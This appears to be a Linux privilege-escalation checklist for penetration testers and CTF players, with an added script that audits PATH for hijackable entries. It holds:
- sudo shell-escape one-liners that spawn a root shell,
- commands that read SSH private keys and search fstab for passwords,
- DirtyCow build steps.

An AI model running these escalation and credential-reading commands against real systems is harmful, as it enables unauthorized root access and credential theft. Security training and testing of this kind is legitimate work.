Overview

Linux is the dominant operating system in server environments, cloud infrastructure, and embedded systems. Understanding its internals is essential for both offensive security and hardening. This page covers the foundational concepts needed before diving into privilege escalation techniques.
This content is intended for authorized penetration testing, CTF competitions, and security research only. Always obtain proper written authorization before testing any system.

Privilege Escalation Checklist

The best automated tool for Linux local privilege escalation enumeration is LinPEAS.

System Information

1. Gather OS Information

Identify the operating system, kernel version, and architecture.
(cat /proc/version || uname -a) 2>/dev/null
lsb_release -a 2>/dev/null
cat /etc/os-release 2>/dev/null

2. Check PATH and Environment

Look for writable folders in PATH and sensitive data in environment variables.
echo $PATH
(env || set) 2>/dev/null

3. Search for Kernel Exploits

Check kernel version against known vulnerabilities like DirtyCow.
cat /proc/version
uname -a
searchsploit "Linux Kernel"

4. Check Sudo Version

Determine if the sudo version is vulnerable to known CVEs.
sudo -V | grep "Sudo ver" | grep "1\.[01234567]\.[0-9]\+\|1\.8\.1[0-9]*\|1\.8\.2[01234567]"

5. Enumerate Defenses

Identify security mechanisms in place: AppArmor, SELinux, ASLR, etc.
# AppArmor
command -v aa-status >/dev/null 2>&1 && aa-status
# SELinux
sestatus 2>/dev/null || echo "Not found"
# ASLR
cat /proc/sys/kernel/randomize_va_space 2>/dev/null
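Step 2 tells you to look for writable folders in PATH, but the command shown only prints the variable. The following POSIX sh function is an added example (not part of the original page) that walks each PATH element and reports the conditions that let a planted binary shadow the real one: empty or relative entries, missing directories, and world-writable directories. It assumes the standard ls -ld permission layout; a group-writable directory owned by another user is not flagged.

```shell
#!/bin/sh
# Added example (not from the original page): audit a PATH string for
# entries that allow binary hijacking. One finding per line, grep-friendly.
#
# Reported conditions:
#   EMPTY-ENTRY           an empty element (leading/trailing ":" or "::"),
#                         which the shell resolves as the current directory
#   RELATIVE <dir>        a relative element, also resolved against the cwd
#   MISSING <dir>         an absent directory, creatable by anyone who can
#                         write its parent
#   WORLD-WRITABLE <dir>  other-write bit set; read from ls -ld so the
#                         result does not depend on who runs the audit
audit_path() {
    path_string=$1
    # Trailing ":" makes the loop below consume the final element too.
    rest="$path_string:"
    while [ -n "$rest" ]; do
        entry=${rest%%:*}
        rest=${rest#*:}
        if [ -z "$entry" ]; then
            echo "EMPTY-ENTRY"
            continue
        fi
        case "$entry" in
            /*) ;;
            *)  echo "RELATIVE $entry"; continue ;;
        esac
        if [ ! -d "$entry" ]; then
            echo "MISSING $entry"
            continue
        fi
        # In "drwxrwxrwx" the 9th character is the other-write bit.
        other_write=$(ls -ld "$entry" | cut -c9)
        if [ "$other_write" = "w" ]; then
            echo "WORLD-WRITABLE $entry"
        fi
    done
}

# Audit the live PATH when run directly; no output means no findings.
audit_path "$PATH"
```

A sticky-bit directory such as /tmp is still reported, because the sticky bit only restricts deletion of other users' files, not creation of a new one.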

Key Checklist Areas

  • List mounted and unmounted drives
  • Check /etc/fstab for credentials
  • Look for writable mount points
ls /dev 2>/dev/null | grep -i "sd"
grep -v "^#" /etc/fstab 2>/dev/null
grep -E "(user|username|login|pass|password|pw|credentials)[=:]" /etc/fstab /etc/mtab 2>/dev/null

  • Check for useful and vulnerable software
  • Monitor running processes for privilege misconfigurations
which nmap aws nc ncat netcat wget curl python python3 perl php ruby docker lxc 2>/dev/null
dpkg -l    # Debian-based
rpm -qa    # CentOS/RHEL
ps aux
ps -ef

  • Look for writable cron scripts or PATH abuse
  • Check for wildcard injection opportunities
crontab -l
ls -al /etc/cron* /etc/at*
cat /etc/cron* /etc/at* /etc/anacrontab /var/spool/cron/crontabs/root 2>/dev/null | grep -v "^#"

  • Check for writable .service files
  • Look for writable binaries executed by services
  • Enumerate systemd timers
systemctl show-environment
systemctl list-timers --all

  • Identify writable Unix domain sockets
  • Check for exploitable D-Bus services
netstat -a -p --unix
nc -U /tmp/socket    # replace /tmp/socket with the socket path found above

  • Map the network position and open ports
  • Check for sniffable traffic
cat /etc/hostname /etc/hosts /etc/resolv.conf
(ifconfig || ip a)
(netstat -punta || ss -ntpu)
timeout 1 tcpdump

  • Enumerate all users, groups, and superusers
  • Check clipboard and password policy
id || (whoami && groups) 2>/dev/null
cut -d: -f1 /etc/passwd
awk -F: '($3 == "0") {print}' /etc/passwd
grep "^PASS_MAX_DAYS\|^PASS_MIN_DAYS\|^PASS_WARN_AGE\|^ENCRYPT_METHOD" /etc/login.defs

  • Review sudo permissions with GTFOBins
  • Find exploitable SUID binaries
sudo -l
find / -perm -4000 2>/dev/null
sudo awk 'BEGIN {system("/bin/sh")}'
sudo find /etc -exec sh -i \;

  • Check for unexpected Linux capabilities
  • Look for unusual ACLs on files
getcap -r / 2>/dev/null
getfacl /etc/passwd 2>/dev/null

  • Review SSH configuration and keys
  • Search profile files, shadow, and backup files
cat ~/.ssh/id_rsa 2>/dev/null
ls -la ~/.ssh/
find / -name "*.bak" -o -name "*.old" 2>/dev/null | head -20

Linux Security Mechanisms

AppArmor

Mandatory access control system that restricts program capabilities using per-program profiles.

SELinux

Security-Enhanced Linux provides fine-grained mandatory access control policies for processes and files.

ASLR

Address Space Layout Randomization randomizes memory addresses to mitigate memory exploitation.

Capabilities

Linux capabilities split root privileges into distinct units that can be independently granted.

CVE-2016-5195 (DirtyCow)

A classic kernel privilege escalation vulnerability affecting Linux kernels up to 3.19.0-73.8.
# Make DirtyCow stable
echo 0 > /proc/sys/vm/dirty_writeback_centisecs
g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow 40847.cpp -lutil
